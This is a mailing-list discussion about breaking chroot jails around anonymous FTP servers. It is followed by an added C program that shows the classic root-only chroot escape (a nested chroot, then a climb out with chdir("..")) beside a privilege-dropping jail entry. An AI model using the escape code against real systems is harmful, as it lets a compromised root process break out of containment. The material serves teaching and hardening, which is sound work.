On Mon, 31 Jan 2000, Steffen Dettmer wrote:
> > * Sebastian Seitz wrote on Sun, Jan 30, 2000 at 21:52 +0100:
> > > stopping the not-so-experienced users. And even the experienced ones would need a little time to break it. I won't have anything really valuable on
> > That's crap. I'm able to break chroot with >10 lines of code in the sploid. Second thing: you have to put ls in /usr/local/ftp/bin too and its needed libraries in /usr/local/ftp/lib...
> Is that that easy? I'm surprised! (But what does "sploid" mean?)

I think he meant exploit.

> Do you say that you can break a chroot'ed anonymous FTP server with a little piece of code? How should that work? I thought the kernel offers definitely no chance for a process to break a chroot?

The usual exploit is a buffer overrun that -- for lack of a better term -- hijacks the ftpd process and executes shell code as that process's UID and whatnot; since ftpd runs on port 21, it generally is run as root. Although I'm a lousy programmer, I think that the "break chroot" is more of a condition of a faulty anonymous ftpd setup than an inherent flaw in chroot(), which will only work as long as the program doesn't get buffer overrun.
dan
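What the thread is arguing over, as an added example written for this page rather than code from any of the posters: the classic escape a process that is still root can perform from inside a chroot (the sort of thing ">10 lines of code in the sploid" refers to), beside the jail-entry sequence an anonymous ftpd should use so that, if a buffer overrun hijacks it later, the shellcode is no longer root when it tries the same trick. Linux/POSIX C. The scratch jail under /tmp (or the cwd), the 64-step climb, and the command-line jail directory, uid and gid are this example's own choices, not anything from the thread; the escape demo only does something when run as root with CAP_SYS_CHROOT, and it undoes its own side effects afterwards.

```c
/* chroot_demo.c: root-only chroot() escape beside a correct jail entry.
 * Added example, not code from any poster in this thread. Linux/POSIX C.
 * Assumptions: /tmp or the cwd is writable (scratch jail via mkdtemp);
 * jail dir, uid and gid for enter_jail() come from the command line. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum { ESCAPE_OK = 0, ESCAPE_NEED_ROOT = 1, ESCAPE_FAILED = 2 };

/* The "few lines" escape: a process that is still root inside a jail makes a
 * subdirectory, chroot()s into it WITHOUT chdir(), so its cwd is now outside
 * the new root, climbs with chdir("..") (the kernel only stops ".." at the
 * process's root, which is no longer above the cwd) until it reaches the real
 * filesystem root, and chroot(".")s there. chroot() needs CAP_SYS_CHROOT, so
 * without it the call fails with EPERM and nothing happens.
 * Side effects are undone afterwards so the demo can run inside a test. */
int chroot_escape_demo(void)
{
    char tmp1[] = "/tmp/jailXXXXXX", tmp2[] = "./jailXXXXXX"; /* constructed */
    char *jaildir;
    struct stat jail, root;
    int saved_cwd, i;

    if (geteuid() != 0)
        return ESCAPE_NEED_ROOT;
    saved_cwd = open(".", O_RDONLY | O_DIRECTORY);
    if (saved_cwd < 0)
        return ESCAPE_FAILED;
    jaildir = mkdtemp(tmp1) ? tmp1 : mkdtemp(tmp2);
    if (jaildir == NULL || stat(jaildir, &jail) != 0) {
        close(saved_cwd);
        return ESCAPE_FAILED;
    }
    if (chroot(jaildir) != 0) {           /* uid 0 but no CAP_SYS_CHROOT */
        rmdir(jaildir);
        close(saved_cwd);
        return ESCAPE_NEED_ROOT;
    }
    /* Root is now jaildir, but the cwd still points outside it. */
    for (i = 0; i < 64; i++)
        if (chdir("..") != 0)
            break;
    if (chroot(".") != 0)                 /* cannot fail as root */
        return ESCAPE_FAILED;
    if (fchdir(saved_cwd) != 0)           /* restore cwd; root is the real "/" */
        return ESCAPE_FAILED;
    close(saved_cwd);
    rmdir(jaildir);
    /* Escaped if "/" no longer resolves to the scratch jail. */
    if (stat("/", &root) != 0)
        return ESCAPE_FAILED;
    return (root.st_ino != jail.st_ino || root.st_dev != jail.st_dev)
           ? ESCAPE_OK : ESCAPE_FAILED;
}

/* How an anonymous ftpd should enter its jail: chdir() first so the cwd is
 * inside, then chroot("."), then give up root for good (supplementary groups,
 * gid, uid, in that order). Once the uid is non-zero, chroot() is refused, so
 * the escape above is not available to shellcode running in this process. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (uid == 0) {                       /* "jailed as root" is not a jail */
        errno = EINVAL;
        return -1;
    }
    if (chdir(dir) != 0 || chroot(".") != 0)
        return -1;
    if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (setuid(0) == 0) {                 /* the drop must be irreversible */
        errno = EPERM;
        return -1;
    }
    return 0;
}

/* Usage: sudo ./chroot_demo [jaildir uid gid] */
int main(int argc, char **argv)
{
    int r = chroot_escape_demo();
    printf("escape from scratch jail: %s\n",
           r == ESCAPE_OK ? "succeeded (we were root)" :
           r == ESCAPE_NEED_ROOT ? "not possible without root/CAP_SYS_CHROOT" :
           "failed");
    if (argc == 4) {
        if (enter_jail(argv[1], (uid_t)atoi(argv[2]), (gid_t)atoi(argv[3])) != 0) {
            perror("enter_jail");
            return 1;
        }
        printf("jailed in %s as uid %s; chroot(\"..\") now: %s\n", argv[1], argv[2],
               chroot("..") == 0 ? "SUCCEEDED (bug!)" : strerror(errno));
    }
    return 0;
}
```

Build with `cc -o chroot_demo chroot_demo.c`. Run as root with no arguments to watch the escape succeed (as an unprivileged user it reports that it cannot); run `sudo ./chroot_demo /usr/local/ftp 65534 65534` to enter a jail the way an ftpd should and see chroot("..") refused once the uid is non-zero (65534 is assumed to be an unprivileged account such as nobody). The order in enter_jail() is the whole point: chdir() before chroot() so the cwd is inside the jail, and the uid drop last because chroot() itself needs root; an ftpd that stays root after chroot() is exactly the "faulty setup" case.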